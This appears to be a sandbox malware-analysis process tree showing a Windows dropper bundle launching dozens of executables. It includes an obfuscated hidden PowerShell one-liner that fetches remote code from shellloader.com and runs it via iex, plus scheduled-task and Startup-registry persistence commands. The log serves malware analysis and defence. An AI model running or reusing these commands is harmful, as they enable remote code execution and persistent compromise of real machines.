C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:8392
-
-
-
C:\Users\Admin\Documents\j11xS3_BCumu_H4g6MiJjfBd.exe"C:\Users\Admin\Documents\j11xS3_BCumu_H4g6MiJjfBd.exe"5⤵PID:5612
-
-
C:\Users\Admin\Documents\VJZQxkVKshq005qxqu5NCpo7.exe"C:\Users\Admin\Documents\VJZQxkVKshq005qxqu5NCpo7.exe"5⤵PID:5196
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:5804
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵PID:5108
-
-
-
-
C:\Users\Admin\Documents\uIC0blV8iQxpLCGQmayFnSIC.exe"C:\Users\Admin\Documents\uIC0blV8iQxpLCGQmayFnSIC.exe"5⤵PID:204
-
C:\Users\Admin\AppData\Roaming\2496920.exe"C:\Users\Admin\AppData\Roaming\2496920.exe"6⤵PID:7544
-
-
C:\Users\Admin\AppData\Roaming\8456642.exe"C:\Users\Admin\AppData\Roaming\8456642.exe"6⤵PID:4672
-
-
C:\Users\Admin\AppData\Roaming\4696576.exe"C:\Users\Admin\AppData\Roaming\4696576.exe"6⤵PID:7916
-
-
C:\Users\Admin\AppData\Roaming\8770942.exe"C:\Users\Admin\AppData\Roaming\8770942.exe"6⤵PID:7632
-
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe"C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe"5⤵PID:5980
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:4236
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:6544
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:7144
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:6824
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:6224
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:2132
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:7532
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:7280
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:7828
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:8840
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:7412
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:9048
-
-
C:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exeC:\Users\Admin\Documents\twLJf5l6BS2zuhFih9FLKN6W.exe6⤵PID:6000
-
-
-
C:\Users\Admin\Documents\ez4zsjjYtUDM5O7sz4ysXzIw.exe"C:\Users\Admin\Documents\ez4zsjjYtUDM5O7sz4ysXzIw.exe"5⤵PID:1428
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:8220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:8980
-
-
-
C:\Users\Admin\Documents\Ig5gpU1091AhSUaIAvn9fDUq.exe"C:\Users\Admin\Documents\Ig5gpU1091AhSUaIAvn9fDUq.exe"5⤵PID:2564
-
C:\Users\Admin\Documents\Ig5gpU1091AhSUaIAvn9fDUq.exe"C:\Users\Admin\Documents\Ig5gpU1091AhSUaIAvn9fDUq.exe" -u6⤵PID:2324
-
-
-
C:\Users\Admin\Documents\vbgu65h3Cl44gwpy6BFq6EGN.exe"C:\Users\Admin\Documents\vbgu65h3Cl44gwpy6BFq6EGN.exe"5⤵PID:4908
-
C:\Users\Admin\AppData\Roaming\8106348.exe"C:\Users\Admin\AppData\Roaming\8106348.exe"6⤵PID:7660
-
-
C:\Users\Admin\AppData\Roaming\4303655.exe"C:\Users\Admin\AppData\Roaming\4303655.exe"6⤵PID:8124
-
-
C:\Users\Admin\AppData\Roaming\4722992.exe"C:\Users\Admin\AppData\Roaming\4722992.exe"6⤵PID:7640
-
-
C:\Users\Admin\AppData\Roaming\7349243.exe"C:\Users\Admin\AppData\Roaming\7349243.exe"6⤵PID:8196
-
-
-
C:\Users\Admin\Documents\_fIB0wcBh4wrI_ASEIjOIy2S.exe"C:\Users\Admin\Documents\_fIB0wcBh4wrI_ASEIjOIy2S.exe"5⤵PID:1844
-
-
C:\Users\Admin\Documents\LAHMnd1X3LD9KOTqlrVo3HSd.exe"C:\Users\Admin\Documents\LAHMnd1X3LD9KOTqlrVo3HSd.exe"5⤵PID:212
-
-
C:\Users\Admin\Documents\yZ5oueib4HGl33Wrp_3QWQhU.exe"C:\Users\Admin\Documents\yZ5oueib4HGl33Wrp_3QWQhU.exe"5⤵PID:5296
-
-
C:\Users\Admin\Documents\s_1gByts516QHtRFs3B9MESo.exe"C:\Users\Admin\Documents\s_1gByts516QHtRFs3B9MESo.exe"5⤵PID:5584
-
C:\Users\Admin\Documents\s_1gByts516QHtRFs3B9MESo.exe"C:\Users\Admin\Documents\s_1gByts516QHtRFs3B9MESo.exe"6⤵PID:4180
-
-
-
C:\Users\Admin\Documents\ZVRSaaHQxPVpnAwItJNIrCwI.exe"C:\Users\Admin\Documents\ZVRSaaHQxPVpnAwItJNIrCwI.exe"5⤵PID:3036
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0677c055f84f3.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4536
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS022FB583\Wed0677c055f84f3.exeWed0677c055f84f3.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:604 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵PID:2808
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"3⤵PID:3148
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵PID:4020
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
PID:7224
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"4⤵PID:3984
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"3⤵PID:528
-
C:\Users\Admin\AppData\Local\Temp\is-2JPFU.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-2JPFU.tmp\setup_2.tmp" /SL5="$3019C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵PID:2572
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵PID:4184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 8044⤵
- Program crash
PID:5232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 8404⤵
- Program crash
PID:5728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 8844⤵
- Program crash
PID:6020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 9564⤵
- Program crash
PID:5384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 9604⤵
- Program crash
PID:4552
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 10764⤵
- Program crash
PID:4448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 10644⤵
- Program crash
PID:2300
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"3⤵PID:1280
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"3⤵PID:832
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"3⤵PID:4168
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a4⤵PID:5604
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵PID:4028
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵PID:1552
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 3525⤵
- Program crash
PID:7008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 3645⤵
- Program crash
PID:1700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 2165⤵
- Program crash
PID:7412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 5965⤵
- Program crash
PID:5648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 6325⤵
- Program crash
PID:9112
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"3⤵PID:4656
-
C:\Users\Admin\AppData\Roaming\6725437.exe"C:\Users\Admin\AppData\Roaming\6725437.exe"4⤵PID:6316
-
-
C:\Users\Admin\AppData\Roaming\4432161.exe"C:\Users\Admin\AppData\Roaming\4432161.exe"4⤵PID:6464
-
-
C:\Users\Admin\AppData\Roaming\4013451.exe"C:\Users\Admin\AppData\Roaming\4013451.exe"4⤵PID:6412
-
-
C:\Users\Admin\AppData\Roaming\3656525.exe"C:\Users\Admin\AppData\Roaming\3656525.exe"4⤵PID:6992
-
-
C:\Users\Admin\AppData\Roaming\1623505.exe"C:\Users\Admin\AppData\Roaming\1623505.exe"4⤵PID:7052
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-BBJQP.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-BBJQP.tmp\setup_2.tmp" /SL5="$70038,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT1⤵PID:4672
-
C:\Users\Admin\AppData\Local\Temp\is-8KF2D.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-8KF2D.tmp\postback.exe" ss12⤵PID:5936
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss13⤵PID:3952
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵PID:6560
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"5⤵PID:924
-
-
-
C:\Users\Admin\AppData\Local\Temp\CWgTCNhqk.exe"C:\Users\Admin\AppData\Local\Temp\CWgTCNhqk.exe"4⤵PID:7196
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"5⤵PID:8820
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\6⤵PID:8368
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F6⤵
- Creates scheduled task(s)
PID:8568
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3388 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5216
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT1⤵PID:204
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5552